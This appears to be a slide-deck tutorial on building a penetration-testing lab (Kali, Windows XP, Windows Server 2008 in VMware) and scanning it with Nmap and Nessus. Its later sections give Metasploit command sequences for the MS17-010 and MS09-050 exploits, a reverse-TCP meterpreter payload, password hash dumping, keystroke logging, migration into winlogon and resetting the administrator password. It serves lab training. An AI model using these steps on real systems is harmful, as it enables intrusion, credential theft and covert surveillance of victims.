free style penetration testing · penetration testing •pen-test, pen-testing •ethical hacking...

Free Style Penetration Testing

Penetration Testing

• Pen-test, Pen-testing

• Ethical hacking techniques

• Weakness in the software systems -> security

• Weak-point

• Websites , Servers , Networks

Vulnerability vs Pen-testing

• Vulnerability testing• Just to identify the potential problems

• Pen-testing • Attack the problems

• Tools……………….• How to leverage• Hit the problem• Collect data• Security analysis

• Tools• Scanners• Attackers

Step

• List of Vulnerabilities/potential problem

• Rank in the order of priority/criticality

• Penetration tests(attack) -> Networks,Servers,Websites• Within network

• Outside network

• Corrected and fixed systems

Install Vmware Workstation

• Download vmware workstation

• Search “vmware workstation download”

• Select “Workstation 15 Pro for Windows”

• Install “Vmware workstation 15 Pro for Windows”

Install kali linux

• Download Kali linux

• Search “kali linux download”

• Select “Kali linux 64Bit” ISO File

• Create New Virtual Machine

• Select “Typical”

• Select “Installer disc image file(iso)”

• Browse to Kali linux iso file

• Guest Operating system “Linux”

• Version “Debian 9.x 64-bit”

Install kali linux

• Virtual machine name “Kali_Linux”

• Location Default

• Specify Disk capacity default

• Select “Store virtual disk as a single file”

• Finish and Install Kali Linux

Customizing Kali Linux

• Install vmware tools• cd /media/cdrom0

• cp VMwareTools-10.2.0-7259539.tar.gz /root

• cd /root

• tar –zxvf VMwareTools-10.2.0-7259539.tar.gz

• cd /vmware-tools-distrib

• ./vmware-install.pl -d

• Run: apt-get update && apt-get upgrade

Install Windows XP

• Copy Windows XP vmdk file (VirtualXPVHD_original.vmdk)• Create New Virtual Machine• Select “Custom”• Choose the virtual machine hardware compatibility -> Default• Guest operation System Installation “I will install the operating system

later”• Select a guest Operation system “Microsoft Windows” • Version “Windows XP Professional”• Virtual machine name: “Windows XP”• Location : Default• Processor Configuration : Default

Install Windows XP

• Memory for the virtual machine : Default

• Network Type “NAT”

• Select I/O Controller Types : Default

• Select a Disk Type : Default

• Select a Disk “Use an existing virtual disk”

• Select an Existing Disk : Browse to file “VirtualXPVHD_original.vmdk”

• Next

• Finish

• Install Windows XP (with no mouse :P)

Install Windows XP

• Install vmware tools

• Firewall off

Install Windows Server 2008

• Copy Windows Server 2008 ISO File

• Select “Typical”

• Select “I will install the operationg system later”

• Browse to Kali linux iso file

• Guest Operating system “Microsoft Windows”

• Version “Windows Server 2008”

• Virtual machine name “Windows Server 2008”

• Location Default

• Specify Disk capacity default

• Select “Store virtual disk as a single file”

• Finish


• Edit Virtual Machine Settings

• Add ISO file image to cd-rom

• Install Windows Server 2008

• Check out “Automatically activate Windows when I’m online”

• Do you want to enter your product key now? “No”

• Select “Windows Server 2008 Standard(Full Installation)”

• Checked “I have selected the edition of Windows that I purchased”

• Next

• Checked “I accept the license terms”


• Which type of installation do you want? “Custom”

• Where do you want to install Windows? “Next”

• Wait…

• Set New Password

Configuring Windows Server 2008 AD

• Install vmware tools

• Add roles

• Next

• Select “Active Directory Domain Services”

• Next

• Install

• Close

• Open “Server manager”


• Select “Roles”• Click “Active Directory Domain Services”• Click “Run the Active Directory Domain Services Installation Wizard”• Next• Next• Select “Create a new domain in a new forest”• Name the forest root domain• Next• Next• Next


• Select “Yes, the computer will use a dynamically…”

• Do you want to continue? Yes

• Next

• Set Password

• Next

• Reboot

Testing Lab Connectivity

• Ping test form Kali Linux to Windows Server 2008

• Nmap test

Basic scanning

• Use nmap• “nmap –n –sV 192.168.138.0/24”

• Scan host• “nmap –n –sV 192.168.138.X”

• Check for fw• “nmap –n –sV 192.168.138.x –reason”

Nessus install in Kali Linux

• Open terminal

• Type “firefox https://www.tenable.com/products/nessus-home &”

• Register and download for amd64 version for kali linux

• Check activation code in your email

• Cd Downloads

• Install nessus “dpkg -i Nessus-8.1.1-debian6_amd64.deb”

• Start nessus service “/etc/init.d/nessusd start”

• Open nessus web “https://kali:8834”• Use root login

Customizing nessus

• Register with activation code

Scanning and hacking Windows XP

• Open nessus web

• New scan

• Select basic network scan

• Fill in windows xp Name,Targets

• Start scan

• See scan result


• Use msfconsole “msfconsole”

• “search ms17-010”

• “use exploit/windows/smb/ms17_010_psexec”

• “set RHOST 192.168.138.X”

• “set LHOST 192.168.138.X”

• “exploit”

• “sysinfo”

• “shell”

• “arp”


• “ifconfig”

• “netstat”

• “ps”

• “screenshot”

• “display /root/xxxx.jpeg”

Scanning and hacking Windows Server 2008

• Open nessus web

• New scan

• Select basic network scan

• Fill in Name,Targets

• Start scan

• See scan result

• Try to hack


• Open Metasploit console “msfconsole”

• Search for Vulnerlability “search ms09-050”

• Select exploit • “use exploit/windows/smb/ms09_050_smb2_negotiate_func_index”

• See information “show info”

• See help “help”

• Set payload• “set PAYLOAD windows/meterpreter/reverse_tcp”

• Set Remote Host• “set RHOST 192.168.X.X”

• Set Local Host• “set LHOST 192.168.X.X”


• Exploit the target host “exploit”

• Get User ID “getuid”

• Go in Windows shell “shell” -> “exit”

• See user file “hashdump”

• See windows screenshot “screenshot”

• Open screenshot “display /root/XXXXX.jpeg” (in terminal)”

• List running process “ps”

• Open notepad in Windows Server

• List running process “ps”

• Attach server to process “migrate xxx” (notepad)

List running process “ps”


• Check process migrate to “getpid”

• Try to keystroke scan “keyscan_start”

• Check keystroke “keyscan_dump”

• Logoff from windows server

• Test Attach server to another process “migrate xxx” (winlogon)

• Can change administrator password

• “shell”

• “net user administrator newpassword”

free style penetration testing · penetration testing •pen-test, pen-testing •ethical hacking...

Documents